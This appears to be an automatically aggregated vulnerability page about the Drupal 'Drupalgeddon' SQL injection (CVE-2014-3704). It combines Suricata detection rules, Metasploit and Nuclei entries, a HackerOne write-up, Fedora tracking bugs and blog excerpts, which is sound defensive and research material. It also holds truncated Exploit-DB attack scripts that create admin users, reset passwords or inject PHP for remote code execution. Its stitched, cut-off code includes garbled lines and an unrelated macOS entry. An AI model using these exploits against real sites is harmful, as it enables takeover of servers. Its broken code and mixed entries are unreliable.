CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 31
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 31
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 31"; flow:established,to_server; http.request_body; content:"%6e%61%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6e\%61\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019452; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 23
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 23
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 23
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 23"; flow:established,to_server; http.request_body; content:"%6ea%6d%65["; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])\%6ea\%6d\%65\[[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019444; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 2
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 2
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 2
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 2"; flow:established,to_server; http.request_body; content:"name%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])name\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019423; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 6
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 6
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 6
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 6"; flow:established,to_server; http.request_body; content:"na%6de%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])na\%6de\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019427; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Suricata
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 12
suricata·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 12
ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 12
Rule: alert http any any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2014-3704 Drupal SQLi attempt URLENCODE 12"; flow:established,to_server; http.request_body; content:"n%61m%65%5b"; nocase; fast_pattern; pcre:"/(?:^|&|Content-Disposition[\x3a][^\n]*?name\s*?=\s*?[\x22\x27])n\%61m\%65\%5b[^\x5d]*?\W/i"; reference:url,pastebin.com/F2Dk9LbX; classtype:web-application-attack; sid:2019433; rev:4; metadata:created_at 2014_10_16, cve CVE_2014_3704, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2020_09_25;)
Exploit-DB
Apple Mac OSX - Install.framework suid Helper Privilege Escalation
exploitdb·2015-09-10
CVE-2015-3704 Apple Mac OSX - Install.framework suid Helper Privilege Escalation
Apple Mac OSX - Install.framework suid Helper Privilege Escalation
---
Source: https://code.google.com/p/google-security-research/issues/detail?id=314
The private Install.framework has a few helper executables in /System/Library/PrivateFrameworks/Install.framework/Resources,
one of which is suid root:
-rwsr-sr-x 1 root wheel 113K Oct 1 2014 runner
Taking a look at it we can see that it's vending an objective-c Distributed Object :)
[ https://developer.apple.com/library/mac/documentation/Cocoa/Conceptual/DistrObjects/DistrObjects.html ]
The main function immediately temporarily drops privs doing
seteuid(getuid()); setegid(getgid());
then reads line from stdin. It passes this to NSConnection rootProxyForConnectionWithRegisteredName to lookup that
name in the DO namespace and create a
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
exploitdb·2014-11-03
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)
Drupal 7.0
//·
include 'common.inc';
include 'password.inc';
// set values
$user_name = 'admin';
$url = isset($argv[1])?$argv[1]:'';
$user_id = isset($argv[2])?intval($argv[2]):1;
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$user_id]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$url = rtrim($url,'/');
list( , $session_name) = explode('://', $url, 2);
// use insecure cookie with sql inj.
$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);
$password = user_hash_password('test');
$session_id = drupal_random_key();
$sec_ssid = drupal_random_key();
$inject = "UNION SELECT $user_id,'$user_name
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
exploitdb·2014-11-03
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)
Drupal 7.0
// and Stefan Esser
//·
include 'common.inc';
include 'password.inc';
// set values
$user_id = 0;
$user_name = '';
$code_inject = 'phpinfo();session_destroy();die("");';
$url = isset($argv[1])?$argv[1]:'';
$code = isset($argv[2])?$argv[2]:'';
if ($url == '-h') {
echo "usage:\n";
echo $argv[0].' $url [$code|$file]'."\n";
die();
}
if (empty($url) || strpos($url,'https') === False) {
echo "please state the cookie url. It works only with https urls.\n";
die();
}
if (!empty($code)) {
if (is_file($code)) {
$code_inject = str_replace('','',file_get_contents($code))));
} else {
$code_inject = $code;
}
}
$code_inject = rtrim($code_inject,';');
$code_inject .= ';session_destroy();die("");';
if (strpos($url, 'www.') === 0) {
$url = substr($url, 4);
}
$_SESSION= array('a'=>'eval(b
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)
exploitdb·2014-10-17·CVSS 7.5
CVE-2014-3704 [HIGH] Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)
Drupal 7.0 array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
exploitdb·2014-10-17
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)
Drupal 7.0 > 6) & 0x3f]
if i >= count:
break
i += 1
if i > 12) & 0x3f]
if i >= count:
break
i += 1
output += itoa64[(value >> 18) & 0x3f]
if i >= count:
break
return output
def rehash(self, stored_hash, password):
# Drupal 6 compatibility
if len(stored_hash) == 32 and stored_hash.find('$') == -1:
return hashlib.md5(password).hexdigest()
# Drupal 7
if stored_hash[0:2] == 'U$':
stored_hash = stored_hash[1:]
password = hashlib.md5(password).hexdigest()
hash_type = stored_hash[0:3]
if hash_type == '$S$':
hash_str = self.password_crypt('sha512', password, stored_hash)
elif hash_type == '$H$' or hash_type == '$P$':
hash_str = self.password_crypt('md5', password, stored_hash)
else:
hash_str = False
return hash_str
# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-dr
Exploit-DB
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
exploitdb·2014-10-16
CVE-2014-3704 Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)
---
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Creditz to https://www.reddit.com/user/fyukyuk
# EDB Note ~ Updated version: https://github.com/kenorb/drupageddon/blob/master/drupal_7.x_sql_injection_sa-core-2014-005.py
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;u
Metasploit
Drupal HTTP Parameter Key/Value SQL Injection
metasploit
Drupal HTTP Parameter Key/Value SQL Injection
Drupal HTTP Parameter Key/Value SQL Injection
This module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32). Two methods are available to trigger the PHP payload on the target: - set TARGET 0: Form-cache PHP injection method (default). This uses the SQLi to upload a malicious form to Drupal's cache, then trigger the cache entry to execute the payload using a POP chain. - set TARGET 1: User-post injection method. This creates a new Drupal user, adds it to the administrators group, enable Drupal's PHP module, grant the administrators the right to bundle PHP code in their post, create a new post containing the payload and preview it
Nuclei
Drupal SQL Injection
nuclei·CVSS 7.5
CVE-2014-3704 [HIGH] Drupal SQL Injection
Drupal SQL Injection
The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
Template:
id: CVE-2014-3704
info:
name: Drupal SQL Injection
author: princechaddha
severity: high
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing specially crafted keys.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the Drupal application and it
arXiv
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
arxiv_fulltext·2019-05-29
ATTACK2VEC: Leveraging Temporal Word Embeddings to Understand the Evolution of Cyberattacks
: Leveraging Temporal Word Embeddings to
Understand the Evolution of Cyberattacks
## Abstract
Despite the fact that cyberattacks are constantly growing in complexity, the research community still lacks effective tools to easily monitor and understand them.
In particular, there is a need for techniques that are able to not only track how prominently certain malicious actions, such as the exploitation of specific vulnerabilities, are exploited in the wild, but also (and more importantly) how these malicious actions factor in as attack steps in more complex cyberattacks.
In this paper we present , a system that uses temporal word embeddings to model how attack steps are exploited in the wild, and track how they evolve.
We test on a dataset of billions of security events collected from the c
Greynoiseio
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
blogs_greynoiseio·2025-05-27
Coordinated Cloud-Based Scanning Operation Targets 75 Known Exposure Points in One Day
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
NoiseLetter April 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
HackerOne
Drupal 7 pre auth sql injection and remote code execution
hackerone·2015-04-06·CVSS 7.5
[HIGH] Drupal 7 pre auth sql injection and remote code execution
Drupal 7 pre auth sql injection and remote code execution
# Motivation
I found a SQL Injection bug in Drupal $value) {
[...]
$new_keys[$key . '_' . $i] = $value;
}
The function assumes that it is called with an array which has no keys. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));
Which results in this SQL Statement
SELECT * from users where name IN (:name_0, :name_1)
with the parameters name_0 = user1 and name_1 = user2.
The Problem occurs, if the array has keys, which are no integers. Example:
db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test) -- ' => 'user1','test' => 'user2')));
this results in an exploitable SQL query:
SELECT * FROM users WHERE name IN (:name_test) -- , :name_test )
Bugzilla
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [epel-all]
bugzilla·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [epel-all]
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this
Bugzilla
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [fedora-all]
bugzilla·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [fedora-all]
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005) [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this iss
Bugzilla
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005)
bugzilla·2014-10-16·CVSS 7.5
CVE-2014-3704 [HIGH] CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005)
CVE-2014-3704 drupal7: SQL injection leading to code execution and privilege escalation (SA-CORE-2014-005)
Stefan Horst discovered a pre-authenticated SQL injection flaw in Drupal. This could lead to code execution and privilege escalation.
Upstream patch:
https://www.drupal.org/files/issues/SA-CORE-2014-005-D7.patch
This issue has been fixed in Drupal 7.32. Version 7.32 is an updates candidate in Fedora and EPEL.
References:
https://www.drupal.org/SA-CORE-2014-005
http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1153403]
Affects: epel-all [bug 1153404]
---
drupal7-7.32-1.fc19 has been pushed to the Fedora 19 stable repository. If problems sti
http://osvdb.org/show/osvdb/113371http://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.htmlhttp://packetstormsecurity.com/files/128721/Drupal-7.31-SQL-Injection.htmlhttp://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.htmlhttp://seclists.org/fulldisclosure/2014/Oct/75http://secunia.com/advisories/59972http://www.debian.org/security/2014/dsa-3051http://www.exploit-db.com/exploits/34984http://www.exploit-db.com/exploits/34992http://www.exploit-db.com/exploits/34993http://www.exploit-db.com/exploits/35150http://www.openwall.com/lists/oss-security/2014/10/15/23http://www.securityfocus.com/archive/1/533706/100/0/threadedhttp://www.securityfocus.com/bid/70595https://www.drupal.org/SA-CORE-2014-005https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.htmlhttps://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.htmlhttp://osvdb.org/show/osvdb/113371http://packetstormsecurity.com/files/128720/Drupal-7.X-SQL-Injection.htmlhttp://packetstormsecurity.com/files/128721/Drupal-7.31-SQL-Injection.htmlhttp://packetstormsecurity.com/files/128741/Drupal-HTTP-Parameter-Key-Value-SQL-Injection.htmlhttp://seclists.org/fulldisclosure/2014/Oct/75http://secunia.com/advisories/59972http://www.debian.org/security/2014/dsa-3051http://www.exploit-db.com/exploits/34984http://www.exploit-db.com/exploits/34992http://www.exploit-db.com/exploits/34993http://www.exploit-db.com/exploits/35150http://www.openwall.com/lists/oss-security/2014/10/15/23http://www.securityfocus.com/archive/1/533706/100/0/threadedhttp://www.securityfocus.com/bid/70595https://www.drupal.org/SA-CORE-2014-005https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.htmlhttps://www.sektioneins.de/en/blog/14-11-03-drupal-sql-injection-vulnerability-PoC.html
2014-10-16
Published
Exploited in the wild